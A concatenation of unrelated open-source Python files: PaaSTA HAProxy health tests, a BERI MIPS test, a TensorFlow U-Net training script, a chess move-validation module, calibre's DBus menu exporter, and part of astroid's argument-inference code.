is True
)
@mock.patch("paasta_tools.paasta_maintenance.gethostbyname", autospec=True)
def test_is_healthy_in_haproxy_unhealthy_path(mock_gethostbyname,):
mock_gethostbyname.return_value = "192.0.2.1"
local_port = 42
backends = [
{"status": "DOWN", "pxname": "service.main", "svname": "192.0.2.1:42_hostname"}
]
assert (
paasta_maintenance.is_healthy_in_haproxy(
local_port=local_port, backends=backends
)
is False
)
@mock.patch("paasta_tools.paasta_maintenance.gethostbyname", autospec=True)
def test_is_healthy_in_haproxy_missing_backend_entirely(mock_gethostbyname,):
mock_gethostbyname.return_value = "192.0.2.1"
local_port = 42
backends = [
{
"status": "DOWN",
"pxname": "service.main",
"svname": "192.0.2.4:666_otherhostname",
}
]
assert (
paasta_maintenance.is_healthy_in_haproxy(
local_port=local_port, backends=backends
)
is False
)
|
#-
# Copyright (c) 2011 Robert N. M. Watson
# All rights reserved.
#
# This software was developed by SRI International and the University of
# Cambridge Computer Laboratory under DARPA/AFRL contract FA8750-10-C-0237
# ("CTSRD"), as part of the DARPA CRASH research programme.
#
# @BERI_LICENSE_HEADER_START@
#
# Licensed to BERI Open Systems C.I.C. (BERI) under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. BERI licenses this
# file to you under the BERI Hardware-Software License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.beri-open-systems.org/legal/license-1-0.txt
#
# Unless required by applicable law or agreed to in writing, Work distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# @BERI_LICENSE_HEADER_END@
#
from beritest_tools import BaseBERITestCase
class test_tne_eq(BaseBERITestCase):
def test_tne_handled(self):
self.assertRegisterEqual(self.MIPS.a2, 0, "tne trapped when equal")
|
import tensorflow as tf
import math
import numpy as np
import os
import pickle
import time
from learning.input_data import input_data
import sys
def learn_model(trainingset_path, model_path, model_restored_path = None, learning_rate = None, verbose = 1):
if not learning_rate :
learning_rate = 0.0005
# Divers variables
Loss = []
Epoch = []
Accuracy = []
Report = ''
verbose = 1
# Training or Predicting
restore = True
# Results and Models
folder_model = model_path
if not os.path.exists(folder_model):
os.makedirs(folder_model)
display_step = 100
save_step = 600
# Network Parameters
image_size = 256
n_input = image_size * image_size
n_classes = 2
dropout = 0.75
depth = 6
hyperparameters = {'depth': depth,'dropout': dropout, 'image_size': image_size,
'model_restored_path': model_restored_path, 'restore': restore}
with open(folder_model+'/hyperparameters.pkl', 'wb') as handle :
pickle.dump(hyperparameters, handle)
# Optimization Parameters
batch_size = 1
training_iters = 500000
epoch_size = 200
Report += '\n\n---Savings---'
Report += '\n Model saved in : '+ folder_model
Report += '\n\n---PARAMETERS---\n'
Report += 'learning_rate : '+ str(learning_rate)+'; \n batch_size : ' + str(batch_size) +';\n depth : ' + str(depth) \
+';\n epoch_size: ' + str(epoch_size)+';\n dropout : ' + str(dropout)+';\n restore : ' + str(restore)\
+';\n (if model restored) restored_model :' + str(model_restored_path)
data_train = input_data(trainingset_path=trainingset_path, type='train')
data_test = input_data(trainingset_path=trainingset_path, type='test')
# Graph input
x = tf.placeholder(tf.float32, shape=(batch_size, image_size, image_size))
y = tf.placeholder(tf.float32, shape=(batch_size*n_input, n_classes))
keep_prob = tf.placeholder(tf.float32)
# Create some wrappers for simplicity
def conv2d(x, W, b, strides=1):
# Conv2D wrapper, with bias and relu activation
x = tf.nn.conv2d(x, W, strides=[1, strides, strides, 1], padding='SAME')
x = tf.nn.bias_add(x, b)
return tf.nn.relu(x)
def maxpool2d(x, k=2):
# MaxPool2D wrapper
return tf.nn.max_pool(x, ksize=[1, k, k, 1], strides=[1, k, k, 1],
padding='SAME')
# Create model
def conv_net(x, weights, biases, dropout, image_size = image_size):
# Reshape input picture
x = tf.reshape(x, shape=[-1, image_size, image_size, 1])
data_temp = x
data_temp_size = [image_size]
relu_results = []
# contraction
for i in range(depth):
conv1 = conv2d(data_temp, weights['wc1'][i], biases['bc1'][i])
conv2 = conv2d(conv1, weights['wc2'][i], biases['bc2'][i])
relu_results.append(conv2)
conv2 = maxpool2d(conv2, k=2)
data_temp_size.append(data_temp_size[-1]/2)
data_temp = conv2
conv1 = conv2d(data_temp, weights['wb1'], biases['bb1'])
conv2 = conv2d(conv1, weights['wb2'], biases['bb2'])
data_temp_size.append(data_temp_size[-1])
data_temp = conv2
# expansion
for i in range(depth):
data_temp = tf.image.resize_images(data_temp, data_temp_size[-1] * 2, data_temp_size[-1] * 2)
upconv = conv2d(data_temp, weights['upconv'][i], biases['upconv'][i])
data_temp_size.append(data_temp_size[-1]*2)
upconv_concat = tf.concat(concat_dim=3, values=[tf.slice(relu_results[depth-i-1], [0, 0, 0, 0],
[-1, data_temp_size[depth-i-1], data_temp_size[depth-i-1], -1]), upconv])
conv1 = conv2d(upconv_concat, weights['we1'][i], biases['be1'][i])
conv2 = conv2d(conv1, weights['we2'][i], biases['be2'][i])
data_temp = conv2
finalconv = tf.nn.conv2d(conv2, weights['finalconv'], strides=[1, 1, 1, 1], padding='SAME')
final_result = tf.reshape(finalconv, tf.TensorShape([finalconv.get_shape().as_list()[0] * data_temp_size[-1] * data_temp_size[-1], 2]))
return final_result
weights = {'wc1':[],'wc2':[],'we1':[],'we2':[],'upconv':[],'finalconv':[],'wb1':[], 'wb2':[]}
biases = {'bc1':[],'bc2':[],'be1':[],'be2':[],'finalconv_b':[],'bb1':[], 'bb2':[],'upconv':[]}
# Contraction
for i in range(depth):
if i == 0:
num_features_init = 1
num_features = 64
else:
num_features = num_features_init * 2
# Store layers weight & bias
weights['wc1'].append(tf.Variable(tf.random_normal([3, 3, num_features_init, num_features], stddev=math.sqrt(2.0/(9.0*float(num_features_init)))), name = 'wc1-%s'%i))
weights['wc2'].append(tf.Variable(tf.random_normal([3, 3, num_features, num_features], stddev=math.sqrt(2.0/(9.0*float(num_features)))), name = 'wc2-%s'%i))
biases['bc1'].append(tf.Variable(tf.random_normal([num_features], stddev=math.sqrt(2.0/(9.0*float(num_features)))), name='bc1-%s'%i))
biases['bc2'].append(tf.Variable(tf.random_normal([num_features], stddev=math.sqrt(2.0/(9.0*float(num_features)))), name='bc2-%s'%i))
image_size = image_size/2
num_features_init = num_features
num_features = num_features_init*2
weights['wb1']= tf.Variable(tf.random_normal([3, 3, num_features_init, num_features], stddev=math.sqrt(2.0/(9.0*float(num_features_init)))),name='wb1-%s'%i)
weights['wb2']= tf.Variable(tf.random_normal([3, 3, num_features, num_features], stddev=math.sqrt(2.0/(9.0*float(num_features)))), name='wb2-%s'%i)
biases['bb1']= tf.Variable(tf.random_normal([num_features]), name='bb2-%s'%i)
biases['bb2']= tf.Variable(tf.random_normal([num_features]), name='bb2-%s'%i)
num_features_init = num_features
for i in range(depth):
num_features = num_features_init/2
weights['upconv'].append(tf.Variable(tf.random_normal([2, 2, num_features_init, num_features]), name='upconv-%s'%i))
biases['upconv'].append(tf.Variable(tf.random_normal([num_features]), name='bupconv-%s'%i))
weights['we1'].append(tf.Variable(tf.random_normal([3, 3, num_features_init, num_features], stddev=math.sqrt(2.0/(9.0*float(num_features_init)))), name='we1-%s'%i))
weights['we2'].append(tf.Variable(tf.random_normal([3, 3, num_features, num_features], stddev=math.sqrt(2.0/(9.0*float(num_features)))), name='we2-%s'%i))
biases['be1'].append(tf.Variable(tf.random_normal([num_features], stddev=math.sqrt(2.0/(9.0*float(num_features)))), name='be1-%s'%i))
biases['be2'].append(tf.Variable(tf.random_normal([num_features], stddev=math.sqrt(2.0/(9.0*float(num_features)))), name='be2-%s'%i))
num_features_init = num_features
weights['finalconv']= tf.Variable(tf.random_normal([1, 1, num_features, n_classes]), name='finalconv-%s'%i)
biases['finalconv_b']= tf.Variable(tf.random_normal([n_classes]), name='bfinalconv-%s'%i)
# Construct model
pred = conv_net(x, weights, biases, keep_prob)
# Define loss and optimizer
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(pred, y))
tf.scalar_summary('Loss', cost)
index = tf.Variable(0, trainable=False)
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
# Evaluate model
correct_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))
mask = tf.argmax(pred, 1)
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
init = tf.initialize_all_variables()
saver = tf.train.Saver(tf.all_variables())
summary_op = tf.merge_all_summaries()
# Launch the graph
Report += '\n\n---Intermediary results---\n'
with tf.Session(config=tf.ConfigProto(log_device_placement=True)) as sess:
last_epoch = 0
if model_restored_path :
folder_restored_model = model_restored_path
saver.restore(sess, folder_restored_model+"/model.ckpt")
file = open(folder_restored_model+'/evolution.pkl','r')
evolution_restored = pickle.load(file)
last_epoch = evolution_restored["steps"][-1]
else:
sess.run(init)
print 'training start'
step = 1
epoch = 1 + last_epoch
while step * batch_size < training_iters:
batch_x, batch_y = data_train.next_batch(batch_size, rnd = True, augmented_data= True)
sess.run(optimizer, feed_dict={x: batch_x, y: batch_y,
keep_prob: dropout})
if step % display_step == 0:
# Calculate batch loss and accuracy
loss, acc, p = sess.run([cost, accuracy, pred], feed_dict={x: batch_x,
y: batch_y,
keep_prob: 1., index: step*batch_size})
prediction = data_train.read_batch(p, batch_size)[0, :, :, 0]
ground_truth = data_train.read_batch(batch_y, batch_size)[0, :, :, 0]
if verbose == 2:
outputs = "Iter " + str(step*batch_size) + ", Minibatch Loss= " + \
"{:.6f}".format(loss) + ", Training Accuracy= " + \
"{:.5f}".format(acc)
print outputs
if step % epoch_size == 0 :
start = time.time()
A = []
L = []
print epoch
data_test.set_batch_start()
print data_test.batch_start
for i in range(data_test.set_size):
batch_x, batch_y = data_test.next_batch(batch_size, rnd=False, augmented_data= False)
loss, acc = sess.run([cost, accuracy], feed_dict={x: batch_x, y: batch_y, keep_prob: 1.})
A.append(acc)
L.append(loss)
if verbose >= 1:
print '--\nAccuracy on patch'+str(i)+': '+str(acc)
print 'Loss on patch'+str(i)+': '+str(loss)
Accuracy.append(np.mean(A))
Loss.append(np.mean(L))
Epoch.append(epoch)
output_2 = '\n----\n Epoch: ' + str(epoch)
output_2+= '\n Accuracy: ' + str(np.mean(A))+';'
output_2+= '\n Loss: ' + str(np.mean(L))+';'
print '\n\n----Scores on test:---' + output_2
Report+= output_2
epoch+=1
if step % save_step == 0:
evolution = {'loss': Loss, 'steps': Epoch, 'accuracy': Accuracy}
with open(folder_model+'/evolution.pkl', 'wb') as handle:
pickle.dump(evolution, handle)
save_path = saver.save(sess, folder_model+"/model.ckpt")
print("Model saved in file: %s" % save_path)
file = open(folder_model+"/report.txt", 'w')
file.write(Report)
file.close()
step += 1
save_path = saver.save(sess, folder_model+"/model.ckpt")
evolution = {'loss': Loss, 'steps': Epoch, 'accuracy': Accuracy}
with open(folder_model+'/evolution.pkl', 'wb') as handle :
pickle.dump(evolution, handle)
print("Model saved in file: %s" % save_path)
print "Optimization Finished!"
if __name__ == "__main__":
import argparse
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--path_training", required=True, help="")
ap.add_argument("-m", "--path_model", required=True, help="")
ap.add_argument("-m_init", "--path_model_init", required=False, help="")
ap.add_argument("-lr", "--learning_rate", required=False, help="")
args = vars(ap.parse_args())
path_training = args["path_training"]
path_model = args["path_model"]
path_model_init = args["path_model_init"]
learning_rate = args["learning_rate"]
if learning_rate :
learning_rate = float(args["learning_rate"])
else : learning_rate = None
learn_model(path_training, path_model, path_model_init, learning_rate)
|
'''
Created on Jul 9, 2016
@author: farid
'''
from definitions import *
class chessman():
def __init__(self , cell , color):
'''
Constructor
'''
self._color = color
self._cell = cell
def is_legal_move(self):
pass
def is_legal_capture(self):
return self.is_legal_capture()
def get_short_name(self):
return type(self).__name__[0]
@property
def row(self):
return self._cell.row
@property
def col(self):
return self._cell.col
class Pawn(chessman):
def is_legal_move(self , new_cell):
if self.col == new_cell.col:
if self._color == WHITE:
if self.col == 2 and (new_cell.row - self.row == 1 or new_cell.row - self.row == 2):
return True
elif self.col > 2 and new_cell.row - self.row == 1:
return True
else:
if self.col == 7 and (new_cell.row - self.row == -1 or new_cell.row - self.row == -2):
return True
elif self.col < 7 and new_cell.row - self.row == -1:
return True
return False
def is_legal_capture(self , new_cell):
if self._color == WHITE:
if (abs(self.col-new_cell.col), new_cell.row - self.row)==(1,1):
return True
else:
if (abs(self.col-new_cell.col), new_cell.row - self.row)==(1,-1):
return True
return False
class Knight(chessman):
def is_legal_move(self , new_cell):
deltaMatrix=(abs(self.col-new_cell.col), abs(new_cell.row - self.row))
if deltaMatrix==(1,2) or deltaMatrix==(2,1):
return True
return False
def get_short_name(self):
return 'N'
class Bishop(chessman):
def is_legal_move(self , new_cell):
if abs(self.col-new_cell.col)==abs(new_cell.row - self.row):
return True
return False
class Rook(chessman):
def is_legal_move(self , new_cell):
if self.col==new_cell.col or new_cell.row == self.row:
return True
return False
class Queen(chessman):
def is_legal_move(self , new_cell):
if self.col==new_cell.col or new_cell.row == self.row:
return True
elif abs(self.col-new_cell.col)==abs(new_cell.row - self.row):
return True
return False
class King(chessman):
def is_legal_move(self , new_cell):
if abs(self.col-new_cell.col)<=1 and abs(new_cell.row - self.row)<=1:
return True
return False
|
#!/usr/bin/env python
# vim:fileencoding=utf-8
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2014, Kovid Goyal <kovid at kovidgoyal.net>'
# Support for excporting Qt's MenuBars/Menus over DBUS. The API is defined in
# dbus-menu.xml from the libdbusmenu project https://launchpad.net/libdbusmenu
import dbus
from PyQt5.Qt import (
QApplication, QMenu, QIcon, QKeySequence, QObject, QEvent, QTimer, pyqtSignal, Qt)
from calibre.utils.dbus_service import Object, BusName, method as dbus_method, dbus_property, signal as dbus_signal
from calibre.gui2.dbus_export.utils import (
setup_for_cli_run, swap_mnemonic_char, key_sequence_to_dbus_shortcut, icon_to_dbus_menu_icon)
null = object()
def PropDict(mapping=()):
return dbus.Dictionary(mapping, signature='sv')
def create_properties_for_action(ac, previous=None):
ans = PropDict()
if ac.isSeparator():
ans['type'] = 'separator'
if not ac.isVisible():
ans['visible'] = False
return ans
text = ac.text() or ac.iconText()
if text:
ans['label'] = swap_mnemonic_char(text)
if not ac.isEnabled():
ans['enabled'] = False
if not ac.isVisible() or ac.property('blocked') is True:
ans['visible'] = False
if ac.menu() is not None:
ans['children-display'] = 'submenu'
if ac.isCheckable():
exclusive = ac.actionGroup() is not None and ac.actionGroup().isExclusive()
ans['toggle-type'] = 'radio' if exclusive else 'checkmark'
ans['toggle-state'] = int(ac.isChecked())
shortcuts = ac.shortcuts()
if shortcuts:
sc = dbus.Array(signature='as')
for s in shortcuts:
if not s.isEmpty():
for x in key_sequence_to_dbus_shortcut(s):
sc.append(dbus.Array(x, signature='s'))
if sc:
ans['shortcut'] = sc[:1] # Unity fails to display the shortcuts at all if more than one is specified
if ac.isIconVisibleInMenu():
icon = ac.icon()
if previous and previous.get('x-qt-icon-cache-key') == icon.cacheKey():
for x in 'icon-data x-qt-icon-cache-key'.split():
ans[x] = previous[x]
else:
data = icon_to_dbus_menu_icon(ac.icon())
if data is not None:
ans['icon-data'] = data
ans['x-qt-icon-cache-key'] = icon.cacheKey()
return ans
def menu_actions(menu):
try:
return menu.actions()
except TypeError:
if isinstance(menu, QMenu):
return QMenu.actions(menu)
raise
class DBusMenu(QObject):
handle_event_signal = pyqtSignal(object, object, object, object)
def __init__(self, object_path, parent=None, bus=None):
QObject.__init__(self, parent)
# Unity barfs is the Event DBUS method does not return immediately, so
# handle it asynchronously
self.handle_event_signal.connect(self.handle_event, type=Qt.QueuedConnection)
self.dbus_api = DBusMenuAPI(self, object_path, bus=bus)
self.set_status = self.dbus_api.set_status
self._next_id = 0
self.action_changed_timer = t = QTimer(self)
t.setInterval(0), t.setSingleShot(True), t.timeout.connect(self.actions_changed)
self.layout_changed_timer = t = QTimer(self)
t.setInterval(0), t.setSingleShot(True), t.timeout.connect(self.layouts_changed)
self.init_maps()
@property
def object_path(self):
return self.dbus_api._object_path
def init_maps(self, qmenu=None):
self.action_changes = set()
self.layout_changes = set()
self.qmenu = qmenu
self._id_to_action, self._action_to_id = {}, {}
self._action_properties = {}
@property
def next_id(self):
self._next_id += 1
return self._next_id
def id_to_action(self, action_id):
if self.qmenu is None:
return None
return self._id_to_action.get(action_id)
def action_to_id(self, action):
if self.qmenu is None:
return None
return self._action_to_id.get(action)
def action_properties(self, action_id, restrict_to=None):
if self.qmenu is None:
return {}
ans = self._action_properties.get(action_id, PropDict())
if restrict_to:
ans = PropDict({k:v for k, v in ans.iteritems() if k in restrict_to})
return ans
def publish_new_menu(self, qmenu=None):
self.init_maps(qmenu)
if qmenu is not None:
qmenu.destroyed.connect(lambda obj=None:self.publish_new_menu())
ac = qmenu.menuAction()
self.add_action(ac)
self.dbus_api.LayoutUpdated(self.dbus_api.revision, 0)
def set_visible(self, visible):
ac = self.id_to_action(0)
if ac is not None and self.qmenu is not None:
changed = False
blocked = not visible
for ac in menu_actions(ac.menu()):
ac_id = self.action_to_id(ac)
if ac_id is not None:
old = ac.property('blocked')
if old is not blocked:
ac.setProperty('blocked', blocked)
self.action_changes.add(ac_id)
changed = True
if changed:
self.action_changed_timer.start()
def add_action(self, ac):
ac_id = 0 if ac.menu() is self.qmenu else self.next_id
self._id_to_action[ac_id] = ac
self._action_to_id[ac] = ac_id
self._action_properties[ac_id] = create_properties_for_action(ac)
if ac.menu() is not None:
self.add_menu(ac.menu())
def add_menu(self, menu):
menu.installEventFilter(self)
for ac in menu_actions(menu):
self.add_action(ac)
def eventFilter(self, obj, ev):
ac = getattr(obj, 'menuAction', lambda : None)()
ac_id = self.action_to_id(ac)
if ac_id is not None:
etype = ev.type()
if etype == QEvent.ActionChanged:
ac_id = self.action_to_id(ev.action())
self.action_changes.add(ac_id)
self.action_changed_timer.start()
elif etype == QEvent.ActionAdded:
self.layout_changes.add(ac_id)
self.layout_changed_timer.start()
self.add_action(ev.action())
elif etype == QEvent.ActionRemoved:
self.layout_changes.add(ac_id)
self.layout_changed_timer.start()
self.action_removed(ev.action())
return False
def actions_changed(self):
updated_props = dbus.Array(signature='(ia{sv})')
removed_props = dbus.Array(signature='(ias)')
for ac_id in self.action_changes:
ac = self.id_to_action(ac_id)
if ac is None:
continue
old_props = self.action_properties(ac_id)
new_props = self._action_properties[ac_id] = create_properties_for_action(ac, old_props)
removed = set(old_props) - set(new_props)
if removed:
removed_props.append((ac_id, dbus.Array(removed, signature='as')))
updated = PropDict({k:v for k, v in new_props.iteritems() if v != old_props.get(k, null)})
if updated:
updated_props.append((ac_id, updated))
self.action_changes = set()
if updated_props or removed_props:
self.dbus_api.ItemsPropertiesUpdated(updated_props, removed_props)
return updated_props, removed_props
def layouts_changed(self):
changes = set()
for ac_id in self.layout_changes:
if ac_id in self._id_to_action:
changes.add(ac_id)
self.layout_changes = set()
if changes:
self.dbus_api.revision += 1
for change in changes:
self.dbus_api.LayoutUpdated(self.dbus_api.revision, change)
return changes
def action_is_in_a_menu(self, ac):
all_menus = {ac.menu() for ac in self._action_to_id}
all_menus.discard(None)
return bool(set(ac.associatedWidgets()).intersection(all_menus))
def action_removed(self, ac):
if not self.action_is_in_a_menu(ac):
ac_id = self._action_to_id.pop(ac, None)
self._id_to_action.pop(ac_id, None)
self._action_properties.pop(ac_id, None)
def get_layout(self, parent_id, depth, property_names):
# Ensure any pending updates are done, as they are needed now
self.actions_changed()
self.layouts_changed()
property_names = property_names or None
props = self.action_properties(parent_id, property_names)
return parent_id, props, self.get_layout_children(parent_id, depth, property_names)
def get_layout_children(self, parent_id, depth, property_names):
ans = dbus.Array(signature='(ia{sv}av)')
ac = self.id_to_action(parent_id)
if ac is not None and depth != 0 and ac.menu() is not None:
for child in menu_actions(ac.menu()):
child_id = self.action_to_id(child)
if child_id is not None:
props = self.action_properties(child_id, property_names)
ans.append((child_id, props, self.get_layout_children(child_id, depth - 1, property_names)))
return ans
def get_properties(self, ids=None, property_names=None):
property_names = property_names or None
ans = dbus.Array(signature='(ia{sv})')
for action_id in (ids or self._id_to_action):
ans.append((action_id, self.action_properties(action_id, property_names)))
return ans
def handle_event(self, action_id, event, data, timestamp):
ac = self.id_to_action(action_id)
if event == 'clicked':
if ac.isCheckable():
ac.toggle()
ac.triggered.emit(ac.isCheckable() and ac.isChecked())
def handle_about_to_show(self, ac):
child_ids = {self.action_to_id(x) for x in menu_actions(ac.menu())}
child_ids.discard(None)
ac_id = self.action_to_id(ac)
ac.menu().aboutToShow.emit()
if ac_id in self.layout_changes or child_ids.intersection(self.action_changes):
return True
return False
class DBusMenuAPI(Object):
IFACE = 'com.canonical.dbusmenu'
def __init__(self, menu, object_path, bus=None):
if bus is None:
bus = dbus.SessionBus()
Object.__init__(self, bus, object_path)
self.status = 'normal'
self.menu = menu
self.revision = 0
@dbus_property(IFACE, signature='u')
def Version(self):
return 3 # GTK 3 uses 3, KDE 4 uses 2
@dbus_property(IFACE, signature='s', emits_changed_signal=True)
def Status(self):
return self.status
def set_status(self, normal=True):
self.status = 'normal' if normal else 'notice'
self.PropertiesChanged(self.IFACE, {'Status': self.status}, [])
@dbus_property(IFACE, signature='s')
def TextDirection(self):
return 'ltr' if QApplication.instance().isLeftToRight() else 'rtl'
@dbus_property(IFACE, signature='as')
def IconThemePath(self):
return dbus.Array(signature='s')
@dbus_method(IFACE, in_signature='iias', out_signature='u(ia{sv}av)')
def GetLayout(self, parentId, recursionDepth, propertyNames):
layout = self.menu.get_layout(parentId, recursionDepth, propertyNames)
return self.revision, layout
@dbus_method(IFACE, in_signature='aias', out_signature='a(ia{sv})')
def GetGroupProperties(self, ids, propertyNames):
return self.menu.get_properties(ids, propertyNames)
@dbus_method(IFACE, in_signature='is', out_signature='v')
def GetProperty(self, id, name):
return self.menu.action_properties(id).get(name, '')
@dbus_method(IFACE, in_signature='isvu', out_signature='')
def Event(self, id, eventId, data, timestamp):
''' This is called by the applet to notify the application an event happened on a
menu item. eventId can be one of the following::
* "clicked"
* "hovered"
* "opened"
* "closed"
Vendor specific events can be added by prefixing them with "x-<vendor>-"'''
if self.menu.id_to_action(id) is not None:
self.menu.handle_event_signal.emit(id, eventId, data, timestamp)
@dbus_method(IFACE, in_signature='a(isvu)', out_signature='ai')
def EventGroup(self, events):
''' Used to pass a set of events as a single message for possibily
several different menuitems. This is done to optimize DBus traffic.
Should return a list of ids that are not found. events is a list of
events in the same format as used for the Event method.'''
missing = dbus.Array(signature='u')
for id, eventId, data, timestamp in events:
if self.menu.id_to_action(id) is not None:
self.menu.handle_event_signal.emit(id, eventId, data, timestamp)
else:
missing.append(id)
return missing
@dbus_method(IFACE, in_signature='i', out_signature='b')
def AboutToShow(self, id):
ac = self.menu.id_to_action(id)
if ac is not None and ac.menu() is not None:
return self.menu.handle_about_to_show(ac)
return False
@dbus_method(IFACE, in_signature='ai', out_signature='aiai')
def AboutToShowGroup(self, ids):
updates_needed = dbus.Array(signature='i')
id_errors = dbus.Array(signature='i')
for ac_id in ids:
ac = self.menu.id_to_action(id)
if ac is not None and ac.menu() is not None:
if self.menu.handle_about_to_show(ac):
updates_needed.append(ac_id)
else:
id_errors.append(ac_id)
return updates_needed, id_errors
@dbus_signal(IFACE, 'a(ia{sv})a(ias)')
def ItemsPropertiesUpdated(self, updatedProps, removedProps):
pass
@dbus_signal(IFACE, 'ui')
def LayoutUpdated(self, revision, parent):
pass
@dbus_signal(IFACE, 'iu')
def ItemActivationRequested(self, id, timestamp):
pass
def test():
setup_for_cli_run()
app = QApplication([])
bus = dbus.SessionBus()
dbus_name = BusName('com.calibre-ebook.TestDBusMenu', bus=bus, do_not_queue=True)
m = QMenu()
ac = m.addAction(QIcon(I('window-close.png')), 'Quit', app.quit)
ac.setShortcut(QKeySequence('Ctrl+Q'))
menu = DBusMenu('/Menu', bus=bus)
menu.publish_new_menu(m)
app.exec_()
del dbus_name
if __name__ == '__main__':
test()
|
# Copyright (c) 2015-2016, 2018-2020 Claudiu Popa <[email protected]>
# Copyright (c) 2015-2016 Ceridwen <[email protected]>
# Copyright (c) 2018 Bryce Guinta <[email protected]>
# Copyright (c) 2018 Nick Drozd <[email protected]>
# Copyright (c) 2018 Anthony Sottile <[email protected]>
# Copyright (c) 2020 hippo91 <[email protected]>
# Copyright (c) 2021 Pierre Sassoulas <[email protected]>
# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html
# For details: https://github.com/PyCQA/astroid/blob/master/LICENSE
from astroid import bases
from astroid import context as contextmod
from astroid import exceptions, nodes, util
class CallSite:
"""Class for understanding arguments passed into a call site
It needs a call context, which contains the arguments and the
keyword arguments that were passed into a given call site.
In order to infer what an argument represents, call :meth:`infer_argument`
with the corresponding function node and the argument name.
:param callcontext:
An instance of :class:`astroid.context.CallContext`, that holds
the arguments for the call site.
:param argument_context_map:
Additional contexts per node, passed in from :attr:`astroid.context.Context.extra_context`
:param context:
An instance of :class:`astroid.context.Context`.
"""
def __init__(self, callcontext, argument_context_map=None, context=None):
if argument_context_map is None:
argument_context_map = {}
self.argument_context_map = argument_context_map
args = callcontext.args
keywords = callcontext.keywords
self.duplicated_keywords = set()
self._unpacked_args = self._unpack_args(args, context=context)
self._unpacked_kwargs = self._unpack_keywords(keywords, context=context)
self.positional_arguments = [
arg for arg in self._unpacked_args if arg is not util.Uninferable
]
self.keyword_arguments = {
key: value
for key, value in self._unpacked_kwargs.items()
if value is not util.Uninferable
}
@classmethod
def from_call(cls, call_node, context=None):
"""Get a CallSite object from the given Call node.
:param context:
An instance of :class:`astroid.context.Context` that will be used
to force a single inference path.
"""
# Determine the callcontext from the given `context` object if any.
context = context or contextmod.InferenceContext()
callcontext = contextmod.CallContext(call_node.args, call_node.keywords)
return cls(callcontext, context=context)
def has_invalid_arguments(self):
"""Check if in the current CallSite were passed *invalid* arguments
This can mean multiple things. For instance, if an unpacking
of an invalid object was passed, then this method will return True.
Other cases can be when the arguments can't be inferred by astroid,
for example, by passing objects which aren't known statically.
"""
return len(self.positional_arguments) != len(self._unpacked_args)
def has_invalid_keywords(self):
"""Check if in the current CallSite were passed *invalid* keyword arguments
For instance, unpacking a dictionary with integer keys is invalid
(**{1:2}), because the keys must be strings, which will make this
method to return True. Other cases where this might return True if
objects which can't be inferred were passed.
"""
return len(self.keyword_arguments) != len(self._unpacked_kwargs)
def _unpack_keywords(self, keywords, context=None):
values = {}
context = context or contextmod.InferenceContext()
context.extra_context = self.argument_context_map
for name, value in keywords:
if name is None:
# Then it's an unpacking operation (**)
try:
inferred = next(value.infer(context=context))
except exceptions.InferenceError:
values[name] = util.Uninferable
continue
if not isinstance(inferred, nodes.Dict):
# Not something we can work with.
values[name] = util.Uninferable
continue
for dict_key, dict_value in inferred.items:
try:
dict_key = next(dict_key.infer(context=context))
except exceptions.InferenceError:
values[name] = util.Uninferable
continue
if not isinstance(dict_key, nodes.Const):
values[name] = util.Uninferable
continue
if not isinstance(dict_key.value, str):
values[name] = util.Uninferable
continue
if dict_key.value in values:
# The name is already in the dictionary
values[dict_key.value] = util.Uninferable
self.duplicated_keywords.add(dict_key.value)
continue
values[dict_key.value] = dict_value
else:
values[name] = value
return values
def _unpack_args(self, args, context=None):
values = []
context = context or contextmod.InferenceContext()
context.extra_context = self.argument_context_map
for arg in args:
if isinstance(arg, nodes.Starred):
try:
inferred = next(arg.value.infer(context=context))
except exceptions.InferenceError:
values.append(util.Uninferable)
continue
if inferred is util.Uninferable:
values.append(util.Uninferable)
continue
if not hasattr(inferred, "elts"):
values.append(util.Uninferable)
continue
values.extend(inferred.elts)
else:
values.append(arg)
return values
def infer_argument(self, funcnode, name, context):
"""infer a function argument value according to the call context
Arguments:
funcnode: The function being called.
name: The name of the argument whose value is being inferred.
context: Inference context object
"""
if name in self.duplicated_keywords:
raise exceptions.InferenceError(
"The arguments passed to {func!r} " " have duplicate keywords.",
call_site=self,
func=funcnode,
arg=name,
context=context,
)
# Look into the keywords first, maybe it's already there.
try:
return self.keyword_arguments[name].infer(context)
except KeyError:
pass
# Too many arguments given and no variable arguments.
if len(self.positional_arguments) > len(funcnode.args.args):
if not funcnode.args.vararg and not funcnode.args.posonlyargs:
raise exceptions.InferenceError(
"Too many positional arguments "
"passed to {func!r} that does "
"not have *args.",
call_site=self,
func=funcnode,
arg=name,
context=context,
)
positional = self.positional_arguments[: len(funcnode.args.args)]
vararg = self.positional_arguments[len(funcnode.args.args) :]
argindex = funcnode.args.find_argname(name)[0]
kwonlyargs = {arg.name for arg in funcnode.args.kwonlyargs}
kwargs = {
key: value
for key, value in self.keyword_arguments.items()
if key not in kwonlyargs
}
# If there are too few positionals compared to
# what the function expects to receive, check to see
# if the missing positional arguments were passed
# as keyword arguments and if so, place them into the
# positional args list.
if len(positional) < len(funcnode.args.args):
for func_arg in funcnode.args.args:
if func_arg.name in kwargs:
arg = kwargs.pop(func_arg.name)
positional.append(arg)
if argindex is not None:
# 2. first argument of instance/class method
if argindex == 0 and funcnode.type in ("method", "classmethod"):
if context.boundnode is not None:
boundnode = context.boundnode
else:
# XXX can do better ?
boundnode = funcnode.parent.frame()
if isinstance(boundnode, nodes.ClassDef):
# Verify that we're accessing a method
# of the metaclass through a class, as in
# `cls.metaclass_method`. In this case, the
# first argument is always the class.
method_scope = funcnode.parent.scope()
if method_scope is boundnode.metaclass():
return iter((boundnode,))
if funcnode.type == "method":
if not isinstance(boundnode, bases.Instance):
boundnode = boundnode.instantiate_class()
return iter((boundnode,))
if funcnode.type == "classmethod":
return iter((boundnode,))
# if we have a method, extract one position
# from the index, so we'll take in account
